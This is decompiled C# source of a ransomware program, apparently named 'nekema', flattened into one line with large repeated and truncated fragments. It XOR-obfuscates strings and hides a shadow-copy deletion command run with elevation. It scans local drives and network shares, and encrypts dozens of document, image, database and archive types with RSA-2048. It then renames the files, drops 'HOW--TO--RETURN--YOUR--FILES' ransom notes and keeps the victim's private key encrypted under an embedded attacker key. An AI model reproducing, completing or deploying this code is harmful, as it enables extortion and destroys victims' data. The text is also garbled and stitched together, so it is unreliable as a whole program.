0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } 0xad, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = 